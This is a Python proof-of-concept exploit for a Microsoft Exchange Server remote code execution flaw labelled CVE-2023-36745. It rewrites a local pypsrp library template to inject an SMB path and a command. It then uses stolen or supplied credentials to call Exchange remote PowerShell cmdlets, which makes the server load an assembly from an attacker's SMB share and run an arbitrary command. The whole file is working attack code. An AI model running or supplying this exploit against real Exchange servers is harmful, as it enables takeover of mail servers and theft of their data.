exp.py
import argparse
def modifyPypsrp(assemblyLoadPath: str, command: str) -> None:
    """Render ``pypsrp/messages.py`` from its ``.tpl`` template.

    Reads ``pypsrp/messages.py.tpl`` and writes ``pypsrp/messages.py`` with
    the ``$$assemblyLoadPath$$`` and ``$$command$$`` placeholders replaced by
    the two arguments. The output file is overwritten on every call, so the
    local ``pypsrp`` package copy is modified in place rather than configured
    at runtime.

    Args:
        assemblyLoadPath: value substituted for ``$$assemblyLoadPath$$``
            (the caller passes the ``-s`` path with backslashes doubled).
        command: value substituted for ``$$command$$`` (the ``-c`` argument).

    Returns:
        None. Side effect: rewrites ``pypsrp/messages.py``.

    Raises:
        OSError: propagated from ``open`` if the template is missing or the
            output path is not writable.
    """
    msg = ""
    # Whole template read at once; both opens use the default locale encoding.
    with open("pypsrp/messages.py.tpl") as f:
        msg = f.read()
    with open("pypsrp/messages.py", "w") as f:
        # Plain str.replace: no quoting or escaping is applied, so the values
        # land in the generated .py source exactly as given.
        msg = msg.replace("$$assemblyLoadPath$$", assemblyLoadPath)
        msg = msg.replace("$$command$$", command)
        f.write(msg)
if __name__ == "__main__":
    # Command-line front end. Every option is required; the help strings
    # document the expected shape of each value.
    parser = argparse.ArgumentParser(
        description="Microsoft Exchange Server CVE-2023-36745 RCE PoC\nExample: python3 exp.py -H exchange.webdxg.com -u webdxg.com\\dddai -p 4IDF7LAU -s \\\\192.168.237.131\\Shares\\ -c calc.exe"
    )
    parser.add_argument(
        "-H",
        dest="host",
        action="store",
        type=str,
        help="netbios, eg. exchange.webdxg.com",
        required=True,
    )
    parser.add_argument(
        "-u",
        dest="username",
        action="store",
        type=str,
        help="username, eg. webdxg.com\\dddai",
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        action="store",
        type=str,
        help="password, eg. 4IDF7LAU",
        required=True,
    )
    parser.add_argument(
        "-s",
        dest="smb",
        action="store",
        type=str,
        help="smb, eg. \\\\192.168.237.131\\Shares\\",
        required=True,
    )
    parser.add_argument(
        "-c",
        dest="cmd",
        action="store",
        type=str,
        help="command, eg. calc.exe",
        required=True,
    )
    args = parser.parse_args()
    host = args.host
    username = args.username
    password = args.password
    # Backslashes are doubled so the path survives being embedded verbatim in
    # the generated messages.py source (see modifyPypsrp).
    smb = args.smb.replace("\\", "\\\\")
    cmd = args.cmd
    # Rewrites pypsrp/messages.py on disk; must happen before the import
    # below, otherwise the unmodified module would be loaded.
    modifyPypsrp(smb, cmd)
    from pypsrp.powershell import PowerShell, RunspacePool
    from pypsrp.wsman import WSMan
    # First WSMan session: Kerberos auth over plain HTTP (ssl=False, port 80)
    # to the "powershell" path, presumably the Exchange remote PowerShell
    # endpoint given the "Microsoft.Exchange" configuration name below.
    # NOTE(review): credentials travel over cleartext HTTP here; from a
    # monitoring standpoint this connection profile is what is observable.
    wsman = WSMan(
        server=host,
        username=username,
        password=password,
        path="powershell",
        ssl=False,
        port=80,
        auth="kerberos",
        scheme="http",
    )
    with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool:
        ps = PowerShell(pool)
        ps.add_cmdlet("Get-Mailbox").add_argument("")
        ps.invoke()
        # Error stream is joined but not inspected for this first call.
        errors = "\n".join([str(s) for s in ps.streams.error])
        # print(errors)
    wsman.close()
    # Second session with identical connection settings; only the cmdlet
    # differs (Get-User instead of Get-Mailbox).
    wsman = WSMan(
        server=host,
        username=username,
        password=password,
        path="powershell",
        ssl=False,
        port=80,
        auth="kerberos",
        scheme="http",
    )
    with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool:
        ps = PowerShell(pool)
        ps.add_cmdlet("Get-User").add_argument("")
        ps.invoke()
        errors = "\n".join([str(s) for s in ps.streams.error])
        # print(errors)
        # The only outcome check: a substring match on the server's error
        # stream. Nothing else is verified, hence the "check it manually"
        # branch; the suppressed print above is the only raw evidence kept.
        if (
            'Cannot convert the "Microsoft.Exchange.Data.MultiValuedProperty`1[FUSE.Paxos.Class1]"'
            in errors
        ):
            print("[+]All seems fine")
        else:
            print("[-]Check it manually")
    wsman.close()